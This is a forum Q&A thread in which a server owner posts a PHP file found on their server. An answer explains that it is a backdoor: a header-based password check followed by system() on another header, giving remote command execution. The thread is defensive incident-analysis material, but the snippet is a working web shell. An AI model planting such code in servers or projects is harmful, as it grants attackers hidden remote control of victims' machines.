# Found File on Server. What does this PHP Snippet do?

Tags: php, linux, apache, security

Hey i found a php File on my Server. I already deleted it.
I am concerned about this.
I cant find anything about HTTP_X_KEY or HTTP_X_CW on the web. Where are they used? Where are they set?
Code Snippet:

```
<?php 
if (sha1($_SERVER['HTTP_X_KEY']) === '32d0703226477059ec090a0c8defc709ce7d0be0') { 
    system($_SERVER['HTTP_X_CW']); 
} ?>
```

Thanks in advance for any help.

Answer (score 1, accepted):

You're right to be concerned about this. This is basically a backdoor. You must investigate to find out how it happened because deleting it doesn't prevent the attacker from doing the same thing again.

The first if statement is here to guarantee only the attacker will be able to use it, this is basically a password check. The `system()` function executes system commands. So basically the attacker is able to execute anything he wants on your machine remotely just by sending an HTTP request containing `HTTP_X_KEY` and `HTTP_X_CW` headers.

What I suggest is you take a look at your HTTP logs to see if any weird request is being made, you can search for the name of the file you deleted for example. And try to identify which service and what endpoint the attacker used to backdoor your server.

Comment: I tried to debug the Serer variable but it seems like it can only be set from inside

Comment: The `$_SERVER` variable is a PHP built-in which enables you - among other things - to access HTTP headers sent by the client.